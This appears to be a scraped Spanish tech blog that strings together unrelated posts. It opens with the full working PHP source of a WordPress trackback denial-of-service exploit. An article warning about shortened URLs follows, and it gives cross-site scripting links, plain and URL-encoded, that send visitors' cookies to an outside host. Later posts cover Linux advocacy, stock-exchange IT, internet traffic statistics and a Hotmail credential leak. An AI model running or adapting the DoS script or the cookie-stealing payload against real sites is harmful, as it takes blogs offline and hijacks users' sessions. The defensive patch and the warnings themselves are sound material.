kernelpanic.org.mx

El problema radica en el archivo wp-trackbacks.php y permite a cualquier novato, individuo o persona, dejar offline  a  cualquier blog que use WordPress como CMS,  con tan solo 5 minutos y una veintena de consultas, si leyeron bien, solo 20 consultas no se necesitan botnes, redes zombies o supercomputadoras para hacer este tipo de ataque DoS.

Por el momento se ha publicado este exploit, creado en php y que se ejecuta  en la consola, pasando por parametro la url del sitio vulnerable, algo asi:

php exploit.php http://blogvulnerable.com

Y aqui esta el codigo del exploit:

<?php
//wordpress Resource exhaustion Exploit
//http://rooibo.wordpress.com/
//security@wordpress.org contacted and get a response,
//but no solution available.
if(count($argv) < 2) {
echo "You need to specify a url to attack\n";
exit;
} $url = $argv[1]; $data = parse_url($url);
if(count($data) < 2) {
echo "The url should have http:// in front of it, and should be complete.\n";
exit;
} if(count($data) == 2) {
$path = '';
} else {
$path = $data['path'];
}
$path = trim($path,'/');
$path .= '/wp-trackback.php';
if($path{0} != '/') {
$path = '/'.$path;
} $b = "";
$b = str_pad($b,140000,'ABCEDFG');
$b = utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,"); $str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol'; $count = 0;
while(1) {
$fp = @fsockopen($data['host'],80);
if(!$fp) {
if($count > 0) {
echo "down!!!!\n";
exit;
}
echo "unable to connect to: ".$data['host']."\n";
exit;
} fputs($fp, "POST $path HTTP/1.1\r\n");
fputs($fp, "Host: ".$data['host']."\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ".strlen($str)."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $str."\r\n\r\n"); echo "hit!\n";
$count++;
} ?>

Todavia no existe parche para reparar el bug, la unica solucion conocida hasta el momento, es la que se manifiesta en el enlace donde nos cuentan el parche:

Editar el archivo wp-trackbacks.php y buscar esta linea:

$charset = $_POST['charset'];

y cambiarla por esta:

$charset = str_replace(”,”,””,$_POST['charset']);
if(is_array($charset)) { exit; }

Para mas informacion pueden visitar este enlace, en el cual explican mucho mas a fondo en que consiste el bug, asi pues, todos a corregir nuestro wordpress, para asi evitar futuros dolores de cabeza.

Gracias a : inconinformatico.net por compartir la Noticia

oy en dia, gracias al furor que ha tenido twitter y otras redes sociales,  se ha hecho muy  comun utilizar paginas que nos brindan el servicio de acortar las direcciones. Este servicio es muy util, ya que  nos permiten  acortar aquellas urls, que  son demasiado largas y que son dificiles de recordar. Su uso  es muy sencillo solo basta con entrar a un sitio de tantos en la red que  nos dan este servicio  como por ejemplo: Bit.ly o tinyurl.com alli en una caja de texto pegamos la URL que deseamos recortar  damos click en el boton y listo tendremos nuestra URL recortada, algo asi como esto:

http://bit.ly/4G4ueH
http://tinyurl.com/ykfuc64

Sin embargo, esto puede llegar a convertirse en un arma de doble filo, debido a que  algun individuo de forma malintencionada puede “camuflar” una URL infectada con algun troyano, o una URL con un script que capture tus cookies (XSS). Y esto como ocurre?? Hay gente que puede caer en un truco tan viejo?? La respuesta es SI. Pongamos un ejemplo, un informatico  ve  que  una nena  muy linda, comparte un enlace de este tipo:

http://sitio.com/prueba.php?variable=”><script>document.location=’http://www.lugarscript.com/cgi-bin/cookie.cgi? ‘%20+document.cookie</script>

o este:

http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e
%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63
%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%
6e%2f%63%6f%6f%6b%69%65%2e%63%67%693f%27%20%2b%64%6f%63%75%6d%65%
6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

Para cualquier persona con sentido comun (bueno eso creo y espero)  que vea este enlace, lo va a ver sospechoso y sabra que ese enlace no es lo que dice ser la nena linda.  Pero que pasaria si se usa una web que nos recorta la URL? Nuestro enlace malicioso quedaria asi:

http://bit.ly/2SOKtG

o asi:

http://bit.ly/3hPNpy

Ahora si, mas de una persona daria click en ese enlace, si la nena linda dice que en esa pequeña se encuentran sus fotos desnuda. Igualmente suele suceder con el URLmalware, muchas veces viene camuflado de esa forma, y  algunas personas  dan click sin pensar que hay detras de esa URL corta.

Recomendaciones.

• Tener sentido comun, y no dar click en cualquier enlace.
• No visitar enlaces sospechosos compartidos por mujeres voluptuosas  o en su defecto hombres.

• Antes de dar click en una URL de este tipo, pase el puntero por el enlace, y este le va a mostrar la verdadera URL, de tal forma, sabras hacia donde te  lleva el enlace.

Estas son pequeñas cosas,  pero  que muchos usuarios de la red no lo saben,  y son blancos faciles de todo el malware que existe en la red.

de:rinconinformatico.net

Hay una línea que separa a los usuarios de sistemas operativos Gnu/Linux en dos grandes grupos. Por un lado están los que al usarlo se llenan de alegría, satisfacción, conocimientos, espíritu de ayuda y un altruismo maravilloso; gente que no critica sin tener conocimientos ni fundamentos (que no se mete donde no debe); gente que le gusta ayudar, probar, intentar, fracasar, volver a intentar, aprender, vivir. Por otro lado están los “otros”, personas egocéntricas y que sin conocer mucho de “que va el rollo” ya se sienten parte de la “elite”; usan distribuciones solo por el placer de burlarse de los que usan Windows.

Es una línea muy delgada, casi imperceptible, y por tanto corremos el riesgo de pasar de un lado al otro a veces sin darnos cuenta. Este artículo es para los usuarios Gnu/Linux del primer grupo, gente altruista y con sed de conocimientos. Ese altruismo hace que nos convirtamos en “evangelizadores” (por llamarlo de alguna manera); personas con ganas de transformar para bien a nuestros amigos y hermanos. Siendo así, hablaremos un poco del cómo ayudar a otras personas a conocer el maravilloso mundo de Gnu/Linux, SIN recurrir a tontos métodos que nos hacen quedar siempre mal (como hacer críticas destructivas, presionar, imponer, insultar, etc.).

Puntos a tener en cuenta antes de intentar convencer a alguien de migrar a Linux

• Nunca olvides la máxima: cada quien está en la libertad de usar el sistema operativo con el que se sienta bien; eso prima sobre todas las cosas.
• Es necesario tener en cuenta los conocimientos, personalidad y edad de la otra persona. No es lo mismo encarar a una ama de casa, que a un estudiante, o a un ingeniero de sistemas.
• NO intentes convertir a todos tus amigos de un solo tajo (el que mucho abarca, poco aprieta). Comienza por los más abiertos e inteligentes, y unos pocos a la vez. Es importante que ellos se sientan acompañados, puesto que el cambio puede ser difícil al principio… de lo contrario con el primer problema que se les presente, van a ir corriendo asustados de nuevo hacia Windows.
• Ten en cuenta que estás gastando de tu tiempo para ayudar a alguien, si no te sientes bien haciéndolo no lo hagas. Si te sientes bien, hazlo con el mayor de los gustos… o ¿porqué si tienes que apresurarte para repararle el Windows XP de tu novia cada 2 meses? ¿tan rico te la chupa? NO, hombre! No más soporte a Microsoft. ¡Aprovecha ese tiempo ayudando de verdad a la gente; aprendiendo y enseñando!
• NO lo intentes con personas que: NO tienen ganas de aprender, que son necias, que son perezosas, troles, que son tercas o que no te caen bien. O dicho de otra forma…
• … intenta convencer a los usuarios que sean inteligentes, que tengan sed de conocimientos, que sean pacientes, personas cercanas a ti (amigos, parientes, a tu novi@(s), etc.), personas a las que les deseas el bien (porque eso es Linux: un bien).
• Olvídate por un momento de decir “puedes modificar el código fuente”. NO es recomendable hacerlo. Por ejemplo, si le dices a tu abuelita que si usa Linux va a poder modificar los drivers de la tarjeta wireless para inyectar paquetes, que además podrá recompilar el kernel cada vez que lo desee, y que puede de paso aprender programación C++ avanzada leyendo los fuentes de programas de terceros, muy seguramente NO va a entender NADA, y en el peor de los casos buscará al cura del pueblo para que te exsorcise.Ese cuento del código fuente úsalo con las personas adecuadas: ingenieros de software, empresas en busca de servicios, estudiantes de programación, etc. No tiene sentido hacerlo con todas las personas.

Atraer usuarios al “otro lado” es una tarea más difícil de lo que parece. Millones de personas usan sistemas operativos de Microsoft pensando (ingenuamente) que es su única alternativa; otros han oído hablar pestes de los sistemas Linux de personas que han tenido malas experiencias. Sea cual sea el problema, lo mejor es siempre identificarlo antes de actuar/hablar.

Analicemos los diferentes problemas y cómo solucionarlos

1. La ignorancia

Muchas personas sencillamente NO conocen otras alternativas. El monopolio actual de Microsoft ha puesto un grueso velo de ignorancia en los ojos de estos ingenuos usuarios, y por tanto NO debemos juzgar a estas personas, simplemente porque NO tienen la culpa de ello.

¿Cómo afrontar este problema? La solución a la ignorancia es la educación. Debemos intentar explicar de la forma más amena posible algunos puntos:

• ¿Qué es Linux?
• Qué se puede hacer con Linux
• Qué NO se puede hacer con Linux
• Porque es bueno migrar a Linux

Es importante que tengas unas buenas bases de conocimientos acerca de estos puntos. Hacer que una persona migre hacia Linux no es tarea fácil. Es necesario hablar con seguridad, demostrar satisfacción, hacer que la otra persona se pregunte “¿porqué diablos este tipo está tan feliz de esa cosa Linux?”.

2. Incultura y piratería

Linux es gratis! Sí, ¿y qué? Windows también lo es. Puedes comprar un CD por 5.000 pesos (2.5 US$, ó 1.6 Euros) en cualquier tienda, sin pagar ningún tipo de licencia. Incluso es posible descargarlo de Internet sin costo alguno. Puedes hacer copias y hacer con ellas lo que te apetezca. Mucha gente lo hace conscientemente, y no le avergüenza hacerlo (a mi tampoco).

Que Microsoft cobre por sus productos no es el problema; ellos han diseñado sistemas operativos, suites ofimáticas, diferentes programas, incluso hardware; y por tanto tienen derecho a cobrar lo que se les venga en gana por dichos servicios. No hay nada de malo en ello, independientemente de si nos dan libertades o no.

El meollo del asunto está en “Qué tan cultos somos” y “Qué clase de ejemplo estamos dando a nuestros amigos, hijos y futuras generaciones”. Nos hemos convertido en LADRONES, y parece que no nos importa ello. Eso es INCULTURA.

Afortunadamente es posible cambiar. Tenemos una maravillosa alternativa libre y gratuita: usar sistemas operativos Gnu/Linux. Sistemas que podemos copiar, regalar, vender, modificar, compartir y todo lo que se te venga a la cabeza, sin que esto nos convierta en piratas. Es importante aclarar eso a los demás, y si detectas que la persona a la que intentas explicarle esto le importa poco o nada el ser un ladrón pirata: ignórala, seguramente perderás tu valioso tiempo. Habla con personas que valgan la pena.

3. Linux NO es anticuado – Aprovecha los recursos

Mucha gente cree que Linux aún es una consola negra y lúgubre en donde todo hay que hacerlo con comandos. ¡Usa los recursos que tengas disponibles! Enséñales el Linux que tienes instalado en tu laptop, muéstrales un vídeo de Compiz Fusion de los tantos que hay. ¡Muchas cosas entran por los ojos! Esos bonitos efectos visuales son como un imán que atrae a nuevos usuarios, o al menos logran captar la atención y robarle una sonrisa de incredulidad a los que lo ven.

Muestra a los demás que visualmente Linux es superior a muchos otros sistemas operativos. Que no tenemos nada, absolutamente nada, que envidiarle a ningún otro sistema operativo. Tú ya lo sabes, ¡es hora de que los demás lo sepan también!

4. Software

Es importante hacer entender a la gente que no va a necesitar de Windows. Y en este punto es bueno que conozcas el software equivalente de Windows en Linux (para las aplicaciones más comunes), para lo cual hay bastantes listados y tablas en Internet.

Como sabrás tenemos suites ofimáticas, gestores de correo, herramientas para mensajería instantánea, navegadores web, gestores de descargasP2P y Torrents , y un largo etc.

Se trata más de desinformación por parte de los usuarios de Windows, pero para eso estamos: ¡para educar!

5. Los juegos

Aquí voy a hacer una pausa y a ponerme la mano en el corazón. Sí, está bien sí hay juegos para Gnu/Linux, pero (hay que reconocerlo) no tan atractivos como los de Windows. El problema radica principalmente en los desarrolladores de juegos, que solo sacan versiones para sistemas operativos de Microsoft.

Frente a este problema tenemos dos opciones: 1. configuramos los juegos de Windows para que corran sobre Linux, para lo cual podemos hacer uso de:

• Wine (Wine Is Not an Emulator) http://www.winehq.org
• Wine Doors http://www.wine-doors.org Wine Doors es una aplicación open source diseñada para instalar una gran variedad de software para Windows usando Wine.
• PlayOnLinux http://www.playonlinux.com Play on Linux, te ofrece algunos scripts que automatizan el proceso de instalación y configuración de juegos en Linux, usando Wine
• Cedega http://www.cedega.com
• Crossover Games (cxgames) http://www.codeweavers.com

O (segundo) podemos simplemente usar los juegos que están desarrollados para ejecutarse directamente sobre Gnu/Linux, o que como en el caso de Enemy Territory: Quake Wars solo requieren algo de configuración extra para correrlos directamente (sin emuladores).

Existen bastantes juegos y la mayoría son libres y/o gratuitos, así que no hay excusa.

Recursos útiles

• Para llamar la atención (suena feo, pero así es), nada mejor que pasarse por el Youtube y buscar vídeos de Compiz Fusion. Este tipo de software no es productivamente funcional, pero debemos reconocer que atraen gente. ¡Pero ojo! Este recurso NO es útil si se lo muestras a alguien a quien no le interese la apariencia de su sistema, o empresas que buscan rendimiento, seguridad y robustez.
• Es necesario conocer las diferentes tipos de distribuciones que existen. Está bien, tu Ubuntu te sirve para lo que necesitas, pero hay otras muchas distribuciones deseosas de que las pruebes. Esto no solo sirve para encontrar tu distro ideal, sino que te permite conocer qué ofrece cada distro. De esta forma podrás recomendar la distro adecuada a la persona adecuada. Hablo de eso con más detalle en este artículo.
• Una buena herramienta que puedes usar es Linux Distribution Chooser, el cual tiene un sistema en el que puedes diligenciar un formulario y que al final te sugerirá, según su criterio, cual distro es la más adecuada para ti.
• El servicio de entrega de CD-ROMs de Ubuntu gratis de Canonical, es una muy buena herramienta para ti y tus amigos. Pero úsalo adecuadamente. Es normal (y sano) que te guardes un CD para ti, como recuerdo y copia de seguridad; pero la idea es que REGALES Y COMPARTAS los demás a tus amigos. Es necesario que sientan que es DE VERDAD GRATIS Y LIBRE, y que sientes un placer enorme al compartirlos con los demás.

extraido de: tecnicoslinux.com.ar

Top 100 Security Assessment, Vulnerability Auditing, & Security Tools

TradElect es un producto de Accenture basado en la plataforma .NET de Microsoft y ha representado para LSE una inversión de 40 millones de libras esterlinas. El sistema fue implantado en 2007, pero su diseño data de 2003.

Recientemente se informó que LSE adquirió la empresa MillenniumIT, de Sri Lanka, por 18 millones de libras esterlinas. MillenniumIT está abocada al desarrollo de un sistema de transacciones bursátiles altamente escalable y veloz respecto de cada transacción específica.

David Lester, director de información y tecnologías de LSE, declaró a la publicación International Banking Systems Journal que “la nueva tecnología es mucho más ligera, rápida y fácil de instalar”. El sistema está basado en Linux y Solaris.

Al anunciar la compra de MillenniumIT, LSE destacó que esta representaría ahorros del orden de los 10 millones de libras esterlinas anuales en gastos relacionados con transacciones, a partir de período 2011-2012.

Lester agregó que la compra de MillenniumIT representa además para la Bolsa de Valores londinense acceso a un amplio espectro de conocimientos sobre TI, como asimismo nuevas posibilidades de generar flujos de ingresos y posibilidades de crear soluciones más innovadoras.

Fuente: International Banking Systems Journal

La empresa Arbor Networks, en asociación con la Universidad de Michigan y Merit Networks han elaborado un acucioso análisis del tráfico global de Internet. El informe, titulado Internet Observatory Report, será presentado el 19 de octubre durante la convención anual de NANOG, entidad gremial que agrupa a los operadores norteamericanos de redes digitales (North American NetworkOperators´ Group).

El análisis es descrito como el más acucioso y completo desde la comercialización de Internet, iniciada a mediados de la década de 1990. Una de las fuentes principales del material estadístico analizado es el esquema de cooperación “Atlas” entre 100 proveedores de acceso a Internet, distribuidos entre 17 países. Arbor Networks ha tenido acceso a los datos de tráfico digital, datos de seguridad e información de enrutadores, hora por hora, desde 2007. En total, 110 organizaciones, proveedores de acceso, operadores de redes troncales, redes regionales y proveedores de contenidos, han contribuido al material estadístico en que se basa la investigación.

Los datos en cuestión consisten de 256 exabytes, es decir, 256 millones de terabytes. En su etapa más intensa, el tráfico analizado excedía los 12 terabits por segundo. El jefe del proyecto, Craig Labovitz, de Arbor Networks, entregó a un grupo selecto de medios estadounidenses porciones del informe.

Según el documento, Internet ha cambiado radicalmente durante los últimos años. La importancia de los 10 a 12 operadores que gestionaban la mayor parte del tráfico hace cinco años, ha sido drásticamente reducida. En la actualidad, lo más importante son los contenidos, situación que al obligado a los operadores a modificar sus modelos de negocios. Hace dos años, gigantes como AT&T y British Telecom exigían pago a los proveedores de contenidos por transmitir sus datos. Actualmente la situación ha dado un giro de 360 grados. Los contenidos son tan importantes, que los proveedores de conexión ofrecen ya sea llevarlos a los consumidores gratuitamente, o incluso pagan a los proveedores de contenidos por con el fin de conservar a sus suscriptores. En grado mayor que antes, se ofrece a los consumidores paquetes en que el acceso a la red es asociado a servicios de vídeo y otros contenidos.

En su presentación preliminar del informe, Labovitz recalca que “hemos sido testigos de un cambio dramático en la forma de conducir negocios en Internet”.

En 2007, los 15 000 principales sitios de Internet representaban alrededor del 50% de todo el tráfico en la red. En 2009, la mitad el tráfico de la red se concentra en alrededor de 150 sitios. El informe distingue entre éstos a 30 “hipergigantes”, que conjuntamente representan el 30% del tráfico de Internet. Algunos de estos hipergigantes son nombres conocidos como Facebook, Google, Microsoft y YouTube. Google, por sí solo, representa el 6% del todo el tráfico de Internet.

Otros son sitios menos conocidos como Akamai, BitGravity, Gravity, Highwinds y Limelight, por no mencionar a Carpathia Hosting, que según el informe representa el 1% del volumen total de tráfico en Internet. Carpathia ofrece una serie de servicios para el mercado corporativo, pero además tiene servicios para el mercado de consumidores, como megaupload.com, megaclick.com, megavideo.com y megaerotic.com.

En consecuencia, la conclusión es que el balance del poder en Internet se ha inclinado a favor de los proveedores de contenidos, y que las entregas de contenidos se han concentrado en un número reducido de gigantes.

Otro elemento importante del informe es que los protocolos específicos están en retirada, beneficiando así a algunos protocolos de vídeo y web, entre los que claramente se distingue Adobe Flash.

Mecanismos como P2P; es decir intercambio de archivos uno-a-uno, han disminuido dramáticamente durante los últimos dos años, según la presentación preliminar del informe de Arbor Networks. En información proporcionada a Techworld se indica que P2P, representaba en 2007 el 3% de todo el tráfico en Internet, y que actualmente ha caído al 0,5%. En otras palabras, Google concentra 12 veces más tráfico digital que el intercambio tradicional de archivos.

La causa de que el intercambio P2P esté cayendo sería que los usuarios prefieren el vídeo en formato stream, en lugar de descargar material audiovisual. Así, se consigue acceso a los contenidos deseados en el momento deseado, en lugar de tener que esperar una descarga de duración quizás prolongada.

Fuentes: Techweb y Techworld

El 1 de octubre, una lista de cuentas iniciadas con las letras A y B fueron publicadas en pastebin.com, sitio usado por desarrolladores para intercambiar código de programación. Tanto los nombres de usuario como las contraseñas fueron publicados en formato de texto en el sitio, escribe Neowin.

Información confirmada
Neowin asegura haber listo la lista y confirma que los datos de las cuentas son auténticos; es decir, se trata de cuentas activas de los dominios @hotmail.com, @msn.com y @live.com , y en su mayoría serían corresponderían a usuarios europeos.

Las oficinas de Microsoft en el Reino Unido y EE.UU. habrían sido informadas sobre la situación, y Neowin sugiere cambiar la clave y preguntas de seguridad lo antes posible para evitar que intrusos tengan acceso a las cuentas.

El tradicional chat mediante IRC está dando sus últimos coletazos, o esa es la sensación que parece tener todos los usuarios de este sistema. Con la llegada y explosión de los distintos clientes de IM como MSN o Gtalk sufrió una estocada prácticamente mortal. Las redes sociales y la inclusión de chats como en el caso de Facebook o Tuenti están rematando la faena.